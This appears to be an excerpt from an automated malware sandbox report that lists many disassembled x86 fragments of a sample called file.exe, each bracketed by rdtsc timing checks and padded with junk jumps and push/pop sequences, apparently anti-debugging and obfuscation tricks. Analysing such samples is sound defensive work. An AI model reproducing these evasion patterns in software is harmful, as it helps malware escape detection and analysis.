                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0189 second address: 4AA01C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+0Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007F4B9132D6A3h 0x00000014 pop eax 0x00000015 mov ecx, ebx 0x00000017 popad 0x00000018 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AA0232 second address: 4AA0238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC06D5 second address: 4AC06DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC06DA second address: 4AC06E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC06E0 second address: 4AC06E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC06E4 second address: 4AC06E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC06E8 second address: 4AC0759 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a jmp 00007F4B9132D6A8h 0x0000000f pushfd 0x00000010 jmp 00007F4B9132D6A2h 0x00000015 adc esi, 72489578h 0x0000001b jmp 00007F4B9132D69Bh 0x00000020 popfd 0x00000021 popad 0x00000022 mov dword ptr [esp], ebp 0x00000025 jmp 00007F4B9132D6A6h 0x0000002a mov ebp, esp 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F4B9132D69Ah 0x00000035 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0759 second address: 4AC0768 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC061B second address: 4AC061F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC061F second address: 4AC062E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC062E second address: 4AC063F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop esi 0x0000000e mov dl, E1h 0x00000010 popad 0x00000011 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC063F second address: 4AC0645 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0645 second address: 4AC0649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0649 second address: 4AC064D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC064D second address: 4AC065C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC065C second address: 4AC0660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0660 second address: 4AC0666 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0666 second address: 4AC066C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC066C second address: 4AC0670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC03FE second address: 4AC0416 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B90BE6234h 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0416 second address: 4AC046B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F4B9132D6A9h 0x00000011 xchg eax, ebp 0x00000012 jmp 00007F4B9132D69Eh 0x00000017 mov ebp, esp 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007F4B9132D6A7h 0x00000020 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC046B second address: 4AC0471 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0471 second address: 4AC0475 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0475 second address: 4AC0479 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0479 second address: 4AC048A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 pushad 0x0000000a movsx edi, si 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop ebx 0x00000011 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC048A second address: 4AC048E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD0143 second address: 4AD0149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD0149 second address: 4AD014D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD014D second address: 4AD0151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD0151 second address: 4AD0166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov edi, esi 0x0000000f mov esi, 23425243h 0x00000014 popad 0x00000015 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD0166 second address: 4AD01B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F4B9132D69Fh 0x00000009 sub ecx, 10FEB9EEh 0x0000000f jmp 00007F4B9132D6A9h 0x00000014 popfd 0x00000015 mov ah, 29h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F4B9132D6A5h 0x00000024 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD01B8 second address: 4AD01CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6231h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B00B21 second address: 4B00B30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B00B30 second address: 4B00B48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B90BE6234h 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B00B48 second address: 4B00B7E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e pushad 0x0000000f mov cx, B96Bh 0x00000013 mov edx, esi 0x00000015 popad 0x00000016 mov ebp, esp 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F4B9132D6A4h 0x00000021 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B00B7E second address: 4B00B84 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B00B84 second address: 4B00B95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B9132D69Dh 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B00B95 second address: 4B00BD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6231h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c pushad 0x0000000d call 00007F4B90BE622Ch 0x00000012 call 00007F4B90BE6232h 0x00000017 pop eax 0x00000018 pop edx 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE01E5 second address: 4AE0209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0209 second address: 4AE020F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE020F second address: 4AE0245 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4B9132D6A8h 0x00000013 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0245 second address: 4AE024B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE024B second address: 4AE027D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F4B9132D6A0h 0x00000010 mov eax, dword ptr [ebp+08h] 0x00000013 pushad 0x00000014 mov ax, 925Dh 0x00000018 push eax 0x00000019 push edx 0x0000001a mov si, 13FFh 0x0000001e rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE027D second address: 4AE0293 instructions: 0x00000000 rdtsc 0x00000002 mov al, F1h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 and dword ptr [eax], 00000000h 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F4B90BE622Ah 0x00000011 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE0293 second address: 4AE02A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4B9132D69Eh 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE02A5 second address: 4AE02A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AE02A9 second address: 4AE02BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax+04h], 00000000h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, 9CCFh 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC0579 second address: 4AC057E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC057E second address: 4AC05BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, edi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F4B9132D6A6h 0x0000000f mov dword ptr [esp], ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4B9132D6A7h 0x00000019 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC05BA second address: 4AC05CE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4B90BE622Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC05CE second address: 4AC05E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4B9132D69Bh 0x00000010 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AC05E4 second address: 4AC05EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD0D0C second address: 4AD0D10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD0D10 second address: 4AD0D42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007F4B90BE6237h 0x0000000b movzx esi, di 0x0000000e pop ebx 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F4B90BE622Ch 0x00000019 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD0D42 second address: 4AD0D81 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushfd 0x0000000c jmp 00007F4B9132D6A0h 0x00000011 jmp 00007F4B9132D6A5h 0x00000016 popfd 0x00000017 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD0D81 second address: 4AD0DA7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6230h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4B90BE622Eh 0x00000012 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD0DA7 second address: 4AD0DAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AD0DAD second address: 4AD0DCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F4B90BE6234h 0x00000010 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B0029D second address: 4B002AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D69Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B002AE second address: 4B002B4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B002B4 second address: 4B002B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B002B8 second address: 4B002D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6233h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov eax, edi 0x00000012 popad 0x00000013 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B002D9 second address: 4B0032B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a pushad 0x0000000b pushad 0x0000000c mov ecx, 37853E11h 0x00000011 popad 0x00000012 mov edi, 2BEC1C50h 0x00000017 popad 0x00000018 push eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F4B9132D6A4h 0x00000020 adc ax, B898h 0x00000025 jmp 00007F4B9132D69Bh 0x0000002a popfd 0x0000002b push eax 0x0000002c push edx 0x0000002d mov edx, eax 0x0000002f rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B0032B second address: 4B0036C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4B90BE6232h 0x00000008 or ax, 62F8h 0x0000000d jmp 00007F4B90BE622Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F4B90BE6235h 0x0000001e rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B0036C second address: 4B003EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [778165FCh] 0x0000000e pushad 0x0000000f jmp 00007F4B9132D69Ch 0x00000014 mov ch, 49h 0x00000016 popad 0x00000017 test eax, eax 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F4B9132D6A3h 0x00000020 sub ecx, 5D44217Eh 0x00000026 jmp 00007F4B9132D6A9h 0x0000002b popfd 0x0000002c mov ah, 0Fh 0x0000002e popad 0x0000002f je 00007F4C03FC0C2Ch 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 mov ecx, 3AFE19DBh 0x0000003d jmp 00007F4B9132D6A0h 0x00000042 popad 0x00000043 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B003EF second address: 4B004B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE622Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, eax 0x0000000b pushad 0x0000000c pushad 0x0000000d mov eax, 2153F86Dh 0x00000012 mov bx, si 0x00000015 popad 0x00000016 popad 0x00000017 xor eax, dword ptr [ebp+08h] 0x0000001a jmp 00007F4B90BE6235h 0x0000001f and ecx, 1Fh 0x00000022 pushad 0x00000023 call 00007F4B90BE622Ch 0x00000028 push ecx 0x00000029 pop edx 0x0000002a pop ecx 0x0000002b mov ch, dh 0x0000002d popad 0x0000002e ror eax, cl 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007F4B90BE6234h 0x00000037 xor al, FFFFFFC8h 0x0000003a jmp 00007F4B90BE622Bh 0x0000003f popfd 0x00000040 mov edx, eax 0x00000042 popad 0x00000043 leave 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 pushfd 0x00000048 jmp 00007F4B90BE6237h 0x0000004d sub ecx, 368571BEh 0x00000053 jmp 00007F4B90BE6239h 0x00000058 popfd 0x00000059 jmp 00007F4B90BE6230h 0x0000005e popad 0x0000005f rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B0057B second address: 4B005E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B9132D6A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov dx, ax 0x0000000e mov esi, 4396BE2Fh 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 pushfd 0x0000001a jmp 00007F4B9132D6A7h 0x0000001f add esi, 4127716Eh 0x00000025 jmp 00007F4B9132D6A9h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B005E1 second address: 4B005E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4B005E7 second address: 4B005EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB0029 second address: 4AB0086 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 5689C926h 0x00000008 mov ebx, 7B3951B2h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ebp 0x00000011 pushad 0x00000012 pushad 0x00000013 call 00007F4B90BE6232h 0x00000018 pop ecx 0x00000019 pushfd 0x0000001a jmp 00007F4B90BE622Bh 0x0000001f adc esi, 46EDAC5Eh 0x00000025 jmp 00007F4B90BE6239h 0x0000002a popfd 0x0000002b popad 0x0000002c popad 0x0000002d mov dword ptr [esp], ebp 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB0086 second address: 4AB008A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB008A second address: 4AB00A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6232h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB00A0 second address: 4AB00DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 jmp 00007F4B9132D69Dh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov bl, al 0x00000013 mov cx, dx 0x00000016 popad 0x00000017 and esp, FFFFFFF8h 0x0000001a pushad 0x0000001b movsx edi, si 0x0000001e movzx ecx, di 0x00000021 popad 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F4B9132D69Eh 0x0000002b rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB00DC second address: 4AB00F0 instructions: 0x00000000 rdtsc 0x00000002 mov dx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 movzx eax, bx 0x0000000a popad 0x0000000b mov dword ptr [esp], ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB00F0 second address: 4AB00F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB00F4 second address: 4AB00FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB00FA second address: 4AB0100 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB0100 second address: 4AB0104 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB0104 second address: 4AB015C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4B9132D6A0h 0x0000000e mov dword ptr [esp], ebx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F4B9132D69Eh 0x00000018 adc eax, 57856908h 0x0000001e jmp 00007F4B9132D69Bh 0x00000023 popfd 0x00000024 mov bx, ax 0x00000027 popad 0x00000028 mov ebx, dword ptr [ebp+10h] 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F4B9132D6A1h 0x00000032 rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB015C second address: 4AB0182 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4B90BE6231h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b mov bh, al 0x0000000d mov ebx, 78521FDCh 0x00000012 popad 0x00000013 push eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 mov bx, cx 0x0000001a rdtsc
                                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4AB0182 second address: 4AB01B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushfd 0x00000009 jmp 00007F4B9132D6A6h 0x0000000e add si, 6028h 0x00000013 jmp 00007F4B9132D69Bh 0x00000018 popfd 0x00000019 rdtsc
